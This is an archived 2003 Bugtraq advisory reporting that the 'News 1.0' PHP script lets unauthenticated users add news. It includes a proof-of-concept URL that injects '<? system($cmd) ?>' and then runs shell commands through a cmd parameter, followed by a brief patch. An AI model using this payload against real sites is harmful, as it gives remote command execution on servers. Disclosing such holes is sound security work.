Vulnerability in News/ξΟΧΟΣΤΙ
From: Over_G (overg@mail.ru)
Date: 03/31/03
- Previous message: KF: "SRT2003-03-31-1219 - SAP world writable server binaries"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 31 Mar 2003 17:16:39 +0400 From: Over_G <overg@mail.ru> To: bugtraq@securityfocus.com
Product: News
Version: 1.0
OffSite: http://xonix.ru
Problem: Add news
--------------------------------------
You may add news without autorization.
http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.
example:
http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?>
then open http://[target]/index.php?cmd=id;uname -a;
etc...
Patch.
Add in index.php :
<input type=hidden name=pass value=<?=$pass?>> Before </form>
And add in script.php after include("config.php");
if (!isset($pass)) exit;
$q=strcmp($pass,$password);
greetz: GipsHack, DHGroup, subj, Lobst, and all, who know me
Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
ogprog@ukr.net
Best regards, Over G[DWC Gr0up]
- Previous message: KF: "SRT2003-03-31-1219 - SAP world writable server binaries"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|